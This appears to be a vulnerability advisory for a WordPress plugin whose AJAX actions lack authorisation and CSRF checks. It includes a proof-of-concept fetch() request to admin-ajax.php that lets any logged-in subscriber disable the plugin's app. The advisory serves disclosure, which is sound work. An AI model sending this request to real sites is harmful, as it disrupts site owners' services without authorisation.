The plugin does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example
Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber fetch("/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'action=mo_discord_disable_app&app_name=test', "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Lana Codes
Lana Codes
Yes
2022-09-26 (about 12 months ago)
2022-09-26 (about 12 months ago)
2023-07-24 (about 2 months ago)